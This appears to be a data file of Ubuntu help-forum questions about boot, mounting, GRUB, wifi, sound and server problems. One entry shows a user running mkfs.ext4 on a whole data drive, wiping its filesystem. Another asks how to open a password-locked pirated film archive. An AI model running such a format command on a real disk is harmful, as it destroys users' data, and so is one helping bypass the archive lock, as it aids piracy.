498169	boot to tty2 on start	on ubuntu 12.04 i had a server with no gdm . i want to boot to tty2 on start up . what would i put into rc.local ? note* i do not have grub tty1 : start on stopped rc runlevel= [ 2345 ] and ( not-container or container container = lxc or container container = lxc-libvirt ) stop on runlevel [ ! 2345 } respawn exec /sbin/getty -8 38400 tty1 tty2 is the same except on runlevel [ 23 ]
498174	dovecot error accessing /tmp/ on 14.04 server	i 've run into a problem , which i do n't entirely understand . occasionally i get this line in /var/mail.err , although all messages seem to be saved normally ( at least i think so ) : dovecot : lda ( < address > ) : error : safe_mkstemp ( /tmp/dovecot.lda . ) failed : permission denied i understand that this permission can be adjusted manually , but i worry that something might have gone wrong with the system itself . the only result that i could google is this : https : //bugzilla.redhat.com/show_bug.cgi ? format=multiple & id=632951 , which says that it is a bug ... some additional info : # uname -a linux 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux # dovecot -- version 2.2.9 i do n't know if that matters , but i am also running the system on raid1 , and it was a very fresh install of the new version of ubuntu . i would appreciate any comments or suggestions how to solve this .
498175	how to downgrade php from 5.5.9 to 5.4 in ubuntu 14.04 ( installed with lamp )	i need to downgrade my php version from 5.5.9 to 5.4 ( using ubuntu 14.04 ) , because i have a code that 's using mysql ( which is deprecated in 5.5.9 ) , and i can not change that code . is there a way to do it ? *i tried the other threads that i saw about that issue in the site , but i could n't find anything that helped me .
498176	lingo installation problem	has anyone ever installed lingo ( linear programming software from lindo systems inc. ) on ubuntu 12.04 ? ? they have a version for linux 32 bits with quite clear installation instructions but despite that , i ca n't get it to run . i have tried to contact lingo tech support but have not received an answer yet .
498182	mount sandisk cruzer 2.0	i recently bought a sandisk cruzer force usb flash drive , and my problem is that i am unable to mount it . in fact am new to ubuntu and i really do n't know how to mount a usb drive on linux . at present i use ubuntu 13.10 as my os . i do n't have any windows sharing with this . i do n't have partitions on my system . i tried sudo fdisk -l and got these results : sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 4152 mb , 4152360960 bytes 255 heads , 63 sectors/track , 504 cylinders , total 8110080 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 4152 mb , 4152360960 bytes 255 heads , 63 sectors/track , 504 cylinders , total 8110080 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x15b11843 disk /dev/mapper/cryptswap1 does n't contain a valid partition table . i want this usb drive to get mounted . please help .
498184	how to play downloaded movies by torrent ?	i have downloaded the movie ( chef ) with help of transmission bittorrent file it was successfully downloaded . it was in form of zip folder when exerted it is asking the password . there is small file in which they have have given link and instruction that to open the folder you need to visit link . when i visited link they are asking to instal some foolish app . so is there any way to open the file without password ?
498185	how to avoid ip packets leaking when openvpn connection drops	i have a laptop running ubuntu 12.04 ( still waiting for the 14.04.1 ) i have set an openvpn network with the network manager . if the vpn drops the network manager set back its route through the available network interface and the packet are routed through the other networks . i there a simple way to avoid that ? after some testing : a vpn gateway can have many different addresses , you can check that using command nslookup vpn_gateway_name if it is the case , each new request to establish a vpn will use randomly one ip in the address pool . to not change the ip filter at each new connection , one can use the dns name of the gateway ; iptables will set one rule for each ip . second rule will looks like sudo iptables -a output -d your_vpn_gateway_dns_name -j accept
498186	how do i stop my screen from reverting to previous states ?	i am using xubuntu 14.04 . it performs fine normally , but every once and a while , the screen starts acting strangely . it suddenly switches to showing a state it was previously in - for example , while working in aptana studio , it will sometimes display the work i was doing a few hours beforehand . this happens with other programs too , though , such as when i switch to my browser , it will display aptana studio . even when it displays the previous state , i am still able to interact with the window that 's really on top . making any changes ( such as hovering over a link , or scrolling ) causes that area to show what it 's supposed to , but the rest of the screen stays showing the old state . ( i previously thought that the problem did n't occur across workspaces , but i 've now seen that it does . ) any ideas what could be going on ? is there any other information i could share to help diagnose the problem ? additional info from the comments : java version : java 7 update 55 64-bit gpu info : nvidia corporation : g92 [ geforce 9800 gtx+ ] : using x.org x server -- nouveau display driver from xserver-xorg-video-nouveau ( open source ) i tried switching the gpu driver to `` nvidia binary driver - version 331.38 from nvidia-331 ( proprietary , tested ) '' , but it had no effect .
498189	ubuntu 14.04 ca n't move files from phone storage to computer	i have a htc one m8 , and when i plug it in it shows up in files as `` android phone '' . it shows my internal storage automatically , and at the top it says `` contains digital photos shotwell '' . but the issue is , when i try to move a file from my phone 's internal storage to a place on my computer ( drag and dropping ) , i get an error and it does n't work . it says there was an error copying it to file into /home/user/ ... and if i press show more details it says this : error getting file : -6 : not supported . any help would be greatly appreciated , and i have seen others having this problem but no solution .
498190	cursor disappearing after starting web browser	my specification ubuntu 12.04 32 bit kernel 3.2.0-23-generic-pae vga intel 2nd generation core processor family integrated graphics controller x.org 1.11.3 my /etc/x11/xorg.conf content : section `` device '' identifier `` configured video device '' driver `` fbdev '' option `` hwcursor '' `` off '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection the problems disappearing history : just some days ago . it happened to my chromium 25 and same now at chromium 34 . i have never experienced this since my ubuntu 12.04 first install in 2012 . disappearing conditions : when i hover my cursor on any element that has tooltip . when i scroll in any application that has scrollbar . when i click . when i right click . cursor appears again if i move mouse a little bit . disappearing position : in all desktop i have ( kde , unity , openbox ) . in all gui applications , chromium it self and beyond . in konsole too . problem after starting chromium : directly my cursor disappears with conditions mentioned above . problem after starting rekonq , firefox , konqueror , and midori : not directly , but in various duration ( less than 1 hour ) , the cursor will disappear again with conditions mentioned above . no problems it does n't happen at all if i do n't start any browser . at reboot , my cursor always be normal again . my attempts i have searched many askubuntu threads about cursor disappear , tried many things , but no luck at all . i have no unclutter in my system . i have removed nagios , mrtg , courier-* , mailman , postfix , squid3 , apache2 , nfs-* , bind9 , and some packages i installed few days before this problem happened . i have set `` off '' in hwcursor line in xorg.conf . i have tried to disable all plugins ( including adobe flash ) on chromium but the problems did n't change at all . i have tried to delete .config/chromium/ folder on home but the problem is still occured . i have tried too gsettings set org.gnome.settings-daemon.plugins.cursor active false , but same . i have read standard output via tailf /var/log/syslog when chromium starts , but i did n't find any strange output . i have asked a guy in # freedesktop but he said something like `` it is strange , i could n't help '' . i have created new user on ubuntu , login there , and the problem still occured . so i think it is not an usual configuration error . i did n't do any kernelish thing before this problem happened . i never do an upgrade before this problem happened ( and actually my system is ok even with no upgrade at all ) . no kernel upgrade , no partial upgrade , even no package upgrade . my questions what is the real problem for me ? x server ( i thought it is not ) ? webkit engine ( but it is too strange an engine affects a system ) ? or what ? any idea to solve this ?
498194	how can i make rythmbox ( or banshee ) scan a specific directory for .is_audio_player	i would like to configure ( or cheat ) rhythmbox to treat an arbitrary directory ( network share ) , so that i can automatically use it to send my music there ( and convert it to suitable formats using .is_audio_player ) , as opposed to using external tools . specifically , i want to transfer music to my windows phone , but apparently transferring music normally to the sd card leads to a world of problems ( duplicate and more song entries - > using up loads of memory and unbearably slowing the phone ) . unfortunately , the native program does n't convert on the fly , ando i was hoping to use rhythmbox to pick and transcode what songs i want and then use the native app to transfer what i choose to the phone . i could work around it by simply using some removable drive ( which is a hassle if i intend to transfer the music often ) or an external app ( which is a hassle because i like to pick songs as i listen to them ) , but i wonder if there is some better solution . )
498198	terminal emulator adds viewpoint	i need to connect to a linux server running rocket software d3 multivalue database on our network from my ubuntu 14.04 desktop . the connection can be either telnet or ssh but , i need the adds viewpoint emulator . does anyone know of a terminal software that includes adds viewpoint emulation for ubuntu ?
498204	usb sound card input ( xonar u7 )	i have an asus xonar u7 usb sound card and it works except for the microphone input which is n't recognized at all by pulseaudio . the `` input '' tab in the sound settings is completely empty . i 've tried using pavucontrol but the u7 is only listed there as an output , not an input . it works on windows and i 'm having this problem on two separate computers ( running ubuntu 14.04 and linux mint 17 ) . the device is listed by arecord -l : card 2 : u7 [ xonar u7 ] , device 1 : usb audio [ usb audio # 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 if anyone else is using the xonar u7 then it would be great if you can confirm that it 's working ( or not ) with audio input . the farthest i 've come is to get audacity to record something ( although very very low ) by setting default audio device to alsa in gstreamer-properties . since my main use is skype ( which uses pulseaudio ) this does n't help very much . alsamixer looks like this :
498208	share wifi internet via wireless	i am connected to a wifi network , i wonder how to share the connection via wireless like in windows : netsh wlan set hostednetwork and staying with internet access . translate google
498212	syncing local dir with mounted network dir	discalimer : this is not my design , it is what i have to work with ! i have a windows share that has two directories : aa & bb . i have them mounted at power up via fstab at /network/ . i also have two local directories aa & bb mounted at /home/user/ . i would like to keep /network/aa synced with /home/user/aa and /network/bb synced with /home/user/bb . i would like to do this as live / real time as possable . here 's why : there are several machines that are setup like this all working from the same windows share . any machine may move a file from aa to bb ( or back ) at anytime . files may be added to aa or bb by others at any time . all the other machines should see this as soon as possible . [ ok , so far , just run it off the network right ? .. keep reading ] so the network that all of this is on is complete crap ! it will generally stay connected for about 8 hours at a time but that is it . so fairly often the /network/aa will go away . my plan is to just work out of /home/user/aa all the time and let the syncing / mirroring happen in the background . all of this is on a factory floor keeping mission critical machines running ( stop rolling your eyes and see disclaimer above ) i know about rsync ( i have it running every night for off site mirrors ) . i am wondering if there is a better way . what i really want is to create what looks like a raid 1 out of /network/aa and /home/user/aa . another ( undesirable ) option is to write a script that watches all the dirs ' involved and copy files accordingly . i belive i can get away with just watching time stamps . [ realtime in this case means that when i file is moved from aa to bb and the network is up , the other mahcines should see the change within 10 seconds or so . 30 seconds at the most . obviously you are sol if the network is down . when it comes back up all of this will have to sync up . when the network does come up , timestamps will dictate the winner of any races that happened off line . ]
498214	keyboard shortcuts do not save after reboot on 14.04	is this a bug ? i assign my keyboard shortcuts ( i.e . f4 to close program , f3 to toggle maximization of window , & f2 to minimize window ) they work for 2-3 boots then reset spontaneously after another boot thereafter . i am using the default keyboard application that came with ubuntu 14.04 installation .
498217	ubuntu 14.04 grinding to a halt - found this command and it seems to help , what is it ?	as title says , laptop was grinding to a halt after a period of time . i have the system monitor running and it seems to show memory use getting higher and higher . i had a look around and found this command : sudo sysctl -w vm.drop_caches=3 it seems to stop my system from grinding to a halt . couple of questions though ( i 'm a linux noob ) : what does the command do ? why does it seem to help ?
498224	how to connect from mysql to web application	i have been trying to setup a local instance for a web application . i am new to mysql and i ca n't understand how to actually connect this database to the actual web application sitting in the /var/www folder in my computer . i have created a database in command line terminal : mysql > create database mydatabase - > ; query ok , 1 row affected ( 0.00 sec ) mysql > create user 'host ' @ 'website.local ' identified by 'hmypassword ' ; query ok , 0 rows affected ( 0.00 sec ) mysql > create user 'host ' @ ' % ' identified by 'mypassword ' ; query ok , 0 rows affected ( 0.00 sec ) mysql > grant all privileges on database . * to 'host ' @ ' % ' ; query ok , 0 rows affected ( 0.01 sec ) mysql > flush privileges ; query ok , 0 rows affected ( 0.00 sec ) mysql > exit bye mysql -u host -h 127.0.0.1 -p enter password : welcome to the mysql monitor . commands end with ; or \g . your mysql connection id is 52 server version : 5.5.37-0ubuntu0.14.04.1 ( ubuntu ) how do i actually connect this database to the website ? i also do n't understand how to make a schema for this databse . whenever i try to refresh my web browser i get the following message : could not access database ! sqlstate [ hy000 ] [ 2002 ] connection refused
498226	how to write to sub-d i/o using bash	i want to control ( write and read ) the sub-d parallel pins ( usually used for interfacing a printer ) using bash-scripts . i know , that i could use pyserial or c , but i do n't like them ; ) . i want to use the sub-d to controll external hardware , and yes , i know , that i could use a rpi or something like that , but i want to use the parallel port of my pc thanks for your help
498232	using rss in qbittorrent	how to make qbittorent download episode as soon as it 's out there ? what are rss rules for instance ? i 'm kinda lost on that section i do n't want to download previous episodes , otherwise i 'll end up downloading trillions of mythbusters videos . i get feed from http : //showrss.info edit , i learnt one thing or two from here but not everything so my question still stands , i have yet to figure out how to ignore previous episodes . i want to download small files from eztv , usually they are something like .lol.hdtv and the episode is around 230mb , i do n't want to download 1gb episodes . for example if you go to 24 and click episode 12 day 9 : 10:00 pm-11:00 am the torrent i download 24 s09e12 hdtv x264-lol [ ettv ]
498234	ca n't start desktop	i just installed ubuntu 14.04 desktop , and i saw the following error during initial startup : the disk drive for /tmp is not ready or not present . are there any workarounds ?
498237	downgrading avconv to 0.8.12 from 9.13	i 'm maintaining a fairly large video editing program that relies heavily on avconv - i 've recently migrated the processing to an amazon ec2 instance , and while most things are working out reasonably well , the audio insertion step is failing . i believe this is because one machine uses an older version of libav - when i type avconv into the console i get the following : development machine : avconv version 0.8.12-6:0.8.12-0ubuntu0.13.10.1 server avconv version 9.13-6:9.13-0ubuntu0.14.04.1 therefore i 'd like to downgrade my servers avconv version in order to test if that is the problem . how would i go about performing the downgrade ? i 've tried searching the apt-cache for avconv but i 'm not getting results , and i 'm not certain how to proceed from here . thanks !
498238	my desktop has pear os . i want to install lubuntu from usb instea	my pc has pear os installed and i would like to install lubuntu instead . i can not boot from the usb stick ( on which lubuntu is installed ) . any suggestions as to how to boot from the usb gratefully received . ( i have changed the boot order in bios to usb fdd as the first device to boot . it still boots up as pear os . ) thanks , john .
498240	gimp , , move objects ( drag & drop ) from work window to another ?	move objects ( drag & drop ) from work window to another on gimp ?
498241	how to upload brushes to gimp	i am trying to upload some new brushes to gimp and i ca n't because it is owned by the root . i have had a quick look at how to do it through sudo but as i am very new to ubuntu is it possible to just give me the command so i can just copy it across ? user/share/gimp/2.0/brushes
498243	gave up waiting for root device 14.04	there are a lot of answers and tutorials how to fix this but i was not able to apply any of the solutions in my case . here is my situation : i have perfectly working ubuntu 12.04 i have installed ubuntu 14.04 the error occurred when i am trying to boot 14.04 ( the 12.04 is working fine ) i have usb stick with 14.04 and working 12.04 so i am able to apply fixes or debug further . running sudo grub-update gives me : > generating grub.cfg ... found linux image : > /boot/vmlinuz-3.5.0-52-generic found initrd image : > /boot/initrd.img-3.5.0-52-generic found linux image : > /boot/vmlinuz-3.5.0-46-generic found initrd image : > /boot/initrd.img-3.5.0-46-generic found linux image : > /boot/vmlinuz-3.5.0-45-generic found initrd image : > /boot/initrd.img-3.5.0-45-generic found linux image : > /boot/vmlinuz-3.5.0-23-generic found initrd image : > /boot/initrd.img-3.5.0-23-generic found memtest86+ image : > /boot/memtest86+.bin found ubuntu 14.04 lts ( 14.04 ) on /dev/sda6 > done one of the solution i have try was to press e on the grub menu and replace the id with /dev/sda6 , but nothing change . what is causing the issue and is there an easy way to fix the grub using the 12.04 ? set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d linux /boot/vmlinuz-3.5.0-52-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-52-generic } -- search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d echo 'loading linux 3.5.0-52-generic ... ' linux /boot/vmlinuz-3.5.0-52-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-52-generic -- set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d linux /boot/vmlinuz-3.5.0-46-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-46-generic } -- search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d echo 'loading linux 3.5.0-46-generic ... ' linux /boot/vmlinuz-3.5.0-46-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-46-generic -- set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d linux /boot/vmlinuz-3.5.0-45-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-45-generic } -- search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d echo 'loading linux 3.5.0-45-generic ... ' linux /boot/vmlinuz-3.5.0-45-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-45-generic -- set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d linux /boot/vmlinuz-3.5.0-23-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-23-generic } -- search -- no-floppy -- fs-uuid -- set=root 0970394e-13f2-47c9-979e-c93cb6eef06d echo 'loading linux 3.5.0-23-generic ... ' linux /boot/vmlinuz-3.5.0-23-generic root=uuid=0970394e-13f2-47c9-979e-c93cb6eef06d ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-23-generic -- set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 linux /boot/vmlinuz-3.13.0-30-generic root=uuid=ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 ro nomodeset quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-30-generic } -- set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 linux /boot/vmlinuz-3.13.0-30-generic root=uuid=ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 ro nomodeset quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-30-generic } -- set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 linux /boot/vmlinuz-3.13.0-30-generic root=uuid=ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 ro recovery nomodeset nomodeset initrd /boot/initrd.img-3.13.0-30-generic } -- set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 linux /boot/vmlinuz-3.13.0-24-generic root=uuid=ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 ro nomodeset quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } -- set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 linux /boot/vmlinuz-3.13.0-24-generic root=uuid=ee707b14-31a7-4f86-a6e5-1b9aa38bdd68 ro recovery nomodeset nomodeset initrd /boot/initrd.img-3.13.0-24-generic }
498246	update makes system act strange	i just downloaded some updates for my ubuntu 14.04 laptop that has support for unity 3d . i noticed that one of the updates was for compiz . i updated it , restarted my system and now everything is different . the font for everything is different ( even in firefox ) , and none of the stuff that is in ~/desktop is displayed on my desktop . also pressing the right mouse button on my desktop does not show a menu . what 's going on ? is this supposed to happen ? is everyone downloading this update having the same problem ? how do i fix it ? below are the contents of ~/.xsession-errors : script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd respawning too fast , stopped below is what the fonts look like now ( and i hate how it looks ! ) also , i looked at the files in my home directory and found a log that i think was made by openjdk . this could have something to do with it because i only noticed it after the system started `` acting strange '' . however , the log is so large , i ca n't post it here . i did , however , put it on my personal dropbox and shared it . you can see it here . please help . i have only had ubuntu on my laptop for three days ( but i am not a noob ; i have plenty of experience ) and i do n't want to have to reinstall .
498247	juju azure bootstrap fails when updating packages	processing triggers for libc-bin ... ldconfig deferred processing now taking place reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : git-man liberror-perl suggested packages : git-daemon-run git-daemon-sysvinit git-doc git-el git-arch git-cvs git-svn git-email git-gui gitk gitweb the following new packages will be installed : git git-man liberror-perl 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 6,741 kb of archives . after this operation , 15.2 mb of additional disk space will be used . err http azure.archive.ubuntu.com/ubuntu/ precise/main liberror-perl all 0.17-1 503 service temporarily unavailable get:1 http azure.archive.ubuntu.com/ubuntu/ precise/main git-man all 1:1.7.9.5-1 [ 630 kb ] get:2 http azure.archive.ubuntu.com/ubuntu/ precise/main git amd64 1:1.7.9.5-1 [ 6,087 kb ] failed to fetch http : //azure.archive.ubuntu.com/ubuntu/pool/main/libe/liberror-perl/liberror-perl_0.17-1_all.deb 503 service temporarily unavailable fetched 6,717 kb in 6s ( 1,006 kb/s ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? error bootstrap failed : rc : 1 stopping instance ... bootstrap failed , destroying environment error rc : 1
498249	do i really have sata 6 gb/s if i get < 400 mb/sec disk reads ?	pawel @ paulbook : ~ $ dmesg | grep -i sata | grep 'link up' [ 2.355461 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 2.691842 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 29631.906614 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 29631.914605 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 41633.796009 ] ata1 : sata link up 6.0 gbps ( sstatus 133 scontrol 300 ) [ 41633.803999 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) pawel @ paulbook : ~ $ dmesg | grep -i -- color ahci [ 1.994964 ] ahci 0000:00:1f.2 : version 3.0 [ 1.995148 ] ahci 0000:00:1f.2 : irq 48 for msi/msi-x [ 1.995180 ] ahci 0000:00:1f.2 : sss flag set , parallel bus scan disabled [ 2.011185 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x35 impl sata mode [ 2.011191 ] ahci 0000:00:1f.2 : flags : 64bit ncq sntf stag pm led clo pio slum part ems sxs apst [ 2.035576 ] scsi0 : ahci [ 2.035697 ] scsi1 : ahci [ 2.035794 ] scsi2 : ahci [ 2.035873 ] scsi3 : ahci [ 2.035939 ] scsi4 : ahci [ 2.036000 ] scsi5 : ahci pawel @ paulbook : ~ $ dmesg | grep -i ahci | grep -i -- color gbps [ 2.011185 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x35 impl sata mode to me it seems that my mainboard has a sata 6 gb/s . however , when i benchmark my ssd i get less than 400 mb/s reads even though the vendor claims `` 550 mb/s sequential reads on both compressible and incompressible data '' is available : pawel @ paulbook : ~ $ sudo hdparm -t /dev/sda /dev/sda : timing buffered disk reads : 1098 mb in 3.00 seconds = 365.76 mb/sec does it mean my mainboard has sata 3 gb/s ? according to lspci i have intel corporation 6 series/c200 series chipset family but i could n't find any information in the internet which sata is supported .
498255	ca n't access files in internal hdd	i 've been trying to get plex to recognize my internal hard drive . after searching google , i came across this walk-through to mount the hdd in another directory in /mount/ i was getting a similar error : # mount /dev/sdb1 /mydisk/ -t auto mount : you must specify the filesystem type i tried finding out the issue and the issue was , i had partitioned it but no filesystem was assigned . # mkfs.ext3 /dev/sdb1 2 > /dev/null ... superblock backups stored on blocks : ... writing inode tables : done creating journal ( 32768 blocks ) : done writing superblocks and filesystem accounting information : done this filesystem will be automatically checked every 39 mounts or 180 days , whichever comes first . use tune2fs -c or -i to override after this it successfully got mounted . my hd is ext4 and my drive is named 'sdc ' so i typed mkfs.ext4 /dev/sdc 2 > /dev/null now when i try to open my hd , i get : unable to access â3tb internalâ error mounting /dev/sdc1 at /media/djehuti/3tb internal : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdc1 '' `` /media/djehuti/3tb internal '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdc1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so also gparted is saying my disc is not 48gb/3tb i hope i did n't lose all my data : /
498257	help with wifi hotspots please !	i know i can make wifi hotspots on ubuntu 14.04 wired - > wifi . but . can i make a hotspot wifi - > wifi ? if so , how ? thanks in advance ; )
498259	wifi problems trusty i386	recently iâve been messing with my wifi card trying to connect to my wifi in ubuntu server precise lts . i could n't get it to connect so i uninstalled it and installed trusty . it is a little laggy with all of the window effects but my biggest concern is the wifi . it says that it is connected and ifconfig displays that its running just fine except that there is 203/412 received packets dropped . every time i try to do anything online related , it gives errors like it has no connection at all . i ca n't update it with `` sudo apt-get update '' and firefox says `` server not found '' at start . please help because this is my server computer and right now its being as useless as a 30-pound calculator .
498264	libreoffice writer problem with format	all of a sudden my libreoffice writer started acting up . my main question now is how to restore the appearance of a document i wrote a year ago that now has a first page whose appearance is unacceptable . i want it to be in the regular 8 1/2 x 11 page format , which is how it was originally . now the print is big , bold , and italicized ( i do n't want this and did n't choose this . ) and i ca n't even read the words on the right-hand side of the page . it kind of looks like it 's in landscape mode , but i 'm not sure . i 've tried using the help tools but do n't know what i 'm doing . i 've clicked on various things and nothing helps . i do n't know how to move the side `` borders '' . i tried to copy the whole thing so that i could maybe deal with it fresh on another page , but i ca n't even copy it - despite trying various things . i have n't had ubuntu for a year yet , but have n't had any seemingly insurmountable problems until now . i realize my description may not be helpful , but i hope somebody can work with me on this .
498267	trouble installing ubuntu 14.04 on macbook	so i had ubuntu 14.04 installed on my lenovo laptop . it worked perfectly but screen resolution was terrible so i wanted to use it on my old 2009 unibody macbook . i transferred the ssd hard drive directly into the macbook from the lenovo and it booted with some issues , and the wifi driver wasnt recognized , but other than that it seemed to work just fine . to relieve those issues i decided to re-install ubuntu 14.04 from a usb and the installation worked fined until i was asked to restart the computer at the end . when i restarted the computer , it took me to the 'gnu grub version 2.02^beta2-9 ' menu screen which contains two options : ubuntu advanced options for ubuntu when i chose 'ubuntu ' , the screen turns purple and doesnt change ( ive let it sit for hours ) . when i chose 'advanced options for ubuntu ' , i receive the following options : ubuntu , with linux 3.13.0-30-generic ubuntu , with linux 3.13.0-30-generic ( recovery mode ) ubuntu , with linux 3.13.0-24-generic ubuntu , with linux 3.13.0-24-generic ( recovery mode ) choosing any of these four options also takes me to the infinite purple screen . if i press 'e ' when i am on the first 'gnu grub version 2.02^beta2-9 ' menu , it has the following : setparams 'ubuntu , with linux 3.13.0-13-generic' recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set=root'hd1 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , gpt2 -- hint-efi=hd1 , gpt2 -- hint -baremetal =ahci1 , gpt2 xxxxxxxx-xxxx-xxxx-xxxxxxxxxxxx else search -- no-floppy -- fs-uuid -- set=root xxxxxxxx-xxxx-xxxx-xxxxxxxxxxxx fi echo 'loading linux 3.13.0-30-generic ..' linux /boot/vmlinuz-3.13.0-30-generic.efi.signed root=uuid=xxxxxxxx-xxxx-xxxx-xxxxxxxxxxxx ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-30-generic i am not sure what to do here . do i need to change some of those parameters ? my knowledge is not sufficient to troubleshoot on my own , and a web search has turned up nothing of use . thank you in advance .
498268	ubuntu 14.04 no sound from speaker	this appears to be a popular topic recently so appologies for only adding to it . i have recently dual booted a dell inspiron 7000 series with ubuntu 14.04 . the sound initially worked but after some time , the speakers stopped working . its worth noting that the headphone jack continued to worked fine . after some searching , i managed to get it working again by purging and re-installing pulseadio and alsa . however , after another few days , the speakers stopped working again . this time , purging and re-installing pulseaudio and alsa did not work . i have checked alsamixer and nothing is muted . i have installed some additional drivers as recommended in some threads but i forget which ones . interesting thing is , ( i think ) alsainfo says my master if off : ! ! -- -- -- -mixer controls for card 1 [ pch ] card hw:1 'pch'/'hda intel pch at 0xf0614000 irq 60 ' ... simple mixer control 'master',0 but alsamixer says it is not : sorry , i have n't got enough reputation to post images . does anybody have any advice ? cheers , dave
498269	accessing a process after closing the consol	basically i am using ubuntu to run a minecraft server via a vps and iâm using putty to control it . once i have started my server and everything is running , iâm in control of the server console , just like hosting a server from home . problem i have is that i have no idea how to regain access to the server console/java process after closing and re-opening putty . my processes are as follows : http : //pastebin.com/86edl1x0 java being the process i would like to regain control over . what command can i use to be able to have access to my server console once i have closed it before hand .
